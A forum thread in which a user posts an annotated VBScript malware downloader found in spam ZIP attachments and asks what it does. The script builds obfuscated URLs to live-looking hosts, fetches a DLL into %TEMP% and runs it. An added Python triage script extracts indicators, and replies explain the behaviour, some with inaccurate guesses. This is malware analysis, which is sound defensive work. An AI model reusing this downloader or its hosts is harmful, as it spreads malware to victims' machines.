OT: Spam script, what does it do?

I keep getting these in my E-mail, contained in attached ZIP files, automatically tossed into the recycle bin, so I retrieved one and thought I'd ask if a script expert can tell me what nefarious task it attempts...

' The archive flattened the script onto one line and stripped everything between
' "<" and ">" as if it were HTML. It is broken out into lines below; the two
' stripped comparisons that can be restored unambiguously ("<>") are restored,
' and the places where real code was lost are marked. Ug, UVl, Wk2, PQg5 and
' Ra1 are referenced but their definitions are among the lost text.

On Error Resume Next
Const Ft4 = 1, Jf3 = 2, Og3 = 8
Const JVo6 = 1, Xc6 = 2, CHe1 = "437", Bt = 2

' Read a file through ADODB.Stream (type 2 = text, codepage 437) and decode it
' with Wk2 (definition lost).
Function Kp(WPw)
    Dim Hq, EMp, SBn6
    Set Hq = CreateObject("ADODB.Stream")
    Hq.type = Xc6
    Hq.Charset = CHe1
    Hq.Open
    Hq.LoadFromFile WPw
    SBn6 = Hq.ReadText
    Hq.Close
    Kp = Wk2(SBn6)
End Function

' Encode a buffer with PQg5 (definition lost) and write it to disk, overwriting
' (SaveToFile mode 2).
Sub UGm4(WPw, MMb)
    Dim Hq, SBn6
    Set Hq = CreateObject("ADODB.Stream")
    Hq.type = Xc6
    Hq.Charset = CHe1
    Hq.Open
    SBn6 = PQg5(MMb)
    Hq.WriteText SBn6
    Hq.SaveToFile WPw, Bt
    Hq.Close
End Sub

Function HVv1(Ys)
    Dim SBn6, Lh4(0)
    If Ys 1 Then   ' text lost here: the rest of HVv1 and the head of the Sub that ends below
        TFq2.Run(Ra1)   ' TFq2 is a WScript.Shell; .Run launches the command Ra1
    End If
End Sub

Function Ak5(GZf)   ' file exists?
    Dim XJg
    Set XJg = CreateObject("Scripting.FileSystemObject")
    Ak5 = XJg.FileExists(GZf)
End Function

Function Kv6(GZf)   ' 8.3 short path of a file
    Dim XJg, YBp1
    Set XJg = CreateObject("Scripting.FileSystemObject")
    Set YBp1 = XJg.GetFile(GZf)
    Kv6 = YBp1.ShortPath
End Function

Function Vt(LZu, IWt5)   ' floating-point modulo
    Dim Ys
    Ys = CDbl(Int(CDbl(LZu)/CDbl(IWt5)))
    Vt = CDbl(LZu) - Ys * CDbl(IWt5)
End Function

' Wichmann-Hill generator (171/172/170 and 30269/30307/30323 are its constants);
' not called in the surviving code.
Function Nt(Df2, SBn6)
    SBn6(1) = 172 * SBn6(1) Mod 30307
    SBn6(0) = 171 * SBn6(0) Mod 30269
    SBn6(2) = 170 * SBn6(2) Mod 30323
    Dim Ui
    Ui = Vt((CDbl(SBn6(0))/30269.0 + CDbl(SBn6(1))/30307.0 + CDbl(SBn6(2))/30323.0), 1.0)
    Nt = Int(Ui * CDbl(Df2))
End Function

Function Ed(KAo2)   ' random integer in 0..KAo2
    Ed = CInt(KAo2*Rnd())
End Function

Sub NXt6(UAl)
    WScript.Sleep(UAl)
End Sub

Randomize
Dim PNz(2), UEc6, MWu1(4), WPw
PNz(0) = 20196
PNz(1) = 9906
PNz(2) = 14078
UEc6 = 13

' Five download URLs, spelled one character at a time to defeat string matching.
If 1=1 Then
    MWu1(0) = "ht"&"tp://" & "l" & "a" & "i" & "s" & "o" & "u" & "8" & "." & "c" & "o" & "m" & "/" & "k" & "k" & "4" & "a" & "9" & "r" & "6" & "t"
End If
If 1=1 Then
    MWu1(1) = "ht"&"tp://" & "n" & "e" & "w" & "f" & "a" & "s" & "h" & "i" & "o" & "n" & "g" & "u" & "i" & "d" & "e" & "." & "c" & "o" & "m" & "/" & "l" & "4" & "p" & "0" & "p"
End If
If 1=1 Then
    MWu1(2) = "ht"&"tp://" & "n" & "j" & "h" & "m" & "p" & "." & "c" & "o" & "m" & "/" & "l" & "s" & "d" & "e" & "b" & "2"
End If
If 1=1 Then
    MWu1(3) = "ht"&"tp://" & "r" & "o" & "o" & "l" & "a" & "n" & "o" & "l" & "i" & "." & "n" & "e" & "t" & "/" & "6" & "z" & "y" & "0" & "8" & "c" & "m"
End If
If 1=1 Then
    MWu1(4) = "ht"&"tp://" & "j" & "o" & "y" & "f" & "o" & "c" & "u" & "s" & "." & "n" & "e" & "t" & "/" & "7" & "5" & "v" & "2" & "y" & "f" & "6"
End If

WPw = "RTzay6XC"   ' base name of the dropped file
Dim TFq2, HKs, AQw, Kv3, UAl
Set objShell = CreateObject("WS"&"cript.Shell")
HKs = objShell.ExpandEnvironmentStrings("%" & "T"&"EMP%")   ' drop directory is %TEMP%
Dim Fk, KUy7, Wn, Cn5, Wx3
KUy7 = False

' Up to 11 attempts: %TEMP%\RTzay6XC0.dll, RTzay6XC1.dll, ...
For Wx3=0 To 10: Do
    AQw = HKs + "\" + WPw + CStr(Wx3) + ".dll"
    If Ak5(AQw) Then
        ' An existing DLL plus a "<shortpath>.txt" marker means "already done": quit.
        Kv3 = Kv6(AQw) & ".txt"
        If Ak5(Kv3) Then
            WScript.Quit(0)
        End If
    End If
    If Not KUy7 Then
        Fk = Ed(UBound(MWu1))          ' pick one of the five URLs at random
        Ug MWu1(Fk), AQw               ' download it to the .dll path (Ug is lost)
        If Err.Number <> 0 Then        ' restored "<>": on failure try the next name/URL
            Exit Do
        End If
        KUy7 = True
    End If
    ' Run the DLL by export name (UVl is lost; the argument shape is that of
    ' rundll32 <dll>,<export> <arg>).
    UVl AQw, "E"&"n"&"hancedStoragePasswordConfig", "1"&"47"
    WScript.Quit(1)
Loop While False: Next

If 3=3 Then
    WScript.Quit(1)
End If

...Jim Thompson

--
| James E.Thompson                                 |    mens     | 
| Analog Innovations                               |     et      | 
Reply to
Jim Thompson
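The posted script hides everything an analyst wants (the download URLs, the COM objects it uses, the %TEMP% drop path, the DLL export it invokes) behind `"h"&"t"&"t"&"p"` style concatenation, which is exactly what makes a quick triage pass useful. The following is an added example, not code from the thread or from the malware: it folds runs of VBScript string literals back together and then pulls out the indicators, without executing anything. The SAMPLE it runs on is constructed to copy the posted script's pattern but points at the reserved .invalid TLD; the extraction rules (URL regex, "long literal" heuristic) are the editor's own and will miss strings built from variables or Chr() calls.

```python
"""Static triage of a VBScript downloader built with literal concatenation.

Added example (not from the thread). Folding "a" & "b" & "c" into "abc" is
enough to read the indicators out of this obfuscation family; nothing here
runs the script or touches the network.
"""
import re

# Constructed sample: same obfuscation style as the posted script, fake hosts.
SAMPLE = r'''
On Error Resume Next
Set Hq = CreateObject("ADODB.Stream")
MWu1(0) = "ht"&"tp://" & "d" & "l" & "." & "e" & "x" & "a" & "m" & "p" & "l" & "e" & "." & "i" & "n" & "v" & "a" & "l" & "i" & "d" & "/" & "k" & "k" & "4"
MWu1(1) = "ht"&"tp://" & "c" & "d" & "n" & "." & "e" & "x" & "a" & "m" & "p" & "l" & "e" & "." & "i" & "n" & "v" & "a" & "l" & "i" & "d" & "/" & "x" & "9" & "z"
Set objShell = CreateObject("WS"&"cript.Shell")
HKs = objShell.ExpandEnvironmentStrings("%" & "T"&"EMP%")
AQw = HKs + "\" + "RTzay6XC" + CStr(Wx3) + ".dll"
UVl AQw, "E"&"n"&"hancedStoragePasswordConfig", "1"&"47"
'''

# One VBScript string literal; an embedded quote is written as "".
_LIT = r'"(?:[^"]|"")*"'
# Two or more literals joined only by &; a variable operand breaks the run,
# so HKs & "\" is deliberately left alone.
_RUN = re.compile(rf'{_LIT}(?:\s*&\s*{_LIT})+')


def fold_concats(src: str) -> str:
    """Collapse "a" & "b" & "c" into "abc" wherever every operand is a literal."""
    def join(m):
        pieces = re.findall(_LIT, m.group(0))
        return '"' + "".join(p[1:-1] for p in pieces) + '"'
    return _RUN.sub(join, src)


def triage(src: str) -> dict:
    """Indicators an analyst wants from the folded script (heuristic, editor's own)."""
    flat = fold_concats(src)
    literals = [s[1:-1] for s in re.findall(_LIT, flat)]
    return {
        "urls": sorted(set(re.findall(r'https?://[^\s"\']+', flat))),
        "com_objects": sorted(set(re.findall(r'CreateObject\("([^"]+)"\)', flat, re.I))),
        "env_vars": sorted(set(re.findall(r'%([A-Za-z_]+)%', flat))),
        # Long non-URL literals surface drop names and rundll32-style export names.
        "other_strings": sorted({s for s in literals if len(s) >= 8 and not s.startswith("http")}),
        "on_error_resume_next": bool(re.search(r'^\s*On Error Resume Next', flat, re.I | re.M)),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

Run the same `triage()` over the pasted script (once it is back on separate lines) and the five concatenated hosts and the EnhancedStoragePasswordConfig export name fall out directly; feed the hosts to your mail and proxy blocklists rather than to a browser.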

Looks like it plops a DLL into system32 from a web address. Maybe it's that Mira botnet spam.

Cheers

Reply to
Martin Riddle

Takes over your computer and votes for Hillary multiple times over. I think they call it a "bot-net" script. She needs all the help she can git. ;-)

Reply to
Julian Barnes

It opens an HTTP connection to download a malware DLL, which it then runs using rundll32.exe. What the DLL then does is unknown and probably variable depending on current needs. It seems to also access your secure password store, probably to try to steal banking logins.

Either way, just make sure you don't run it.

Reply to
Clifford Heath

As others have said, it visits a dodgy site, downloads a nasty DLL and tries to run it.

Are you sure they are not scripts attached to Word or Excel documents?

Never allow anything from an untrusted site to run. And at the moment there is yet another zero-day exploit of some J2K decoders in play :( Rendering the image allows the exploit.

This one targets PDF embedded JPEGs and gives full code execution :( :(

formatting link

In more detail for geeks:

formatting link

It has never been more important to make sure that your viewers are properly up to date.

--
Regards, 
Martin Brown
Reply to
Martin Brown
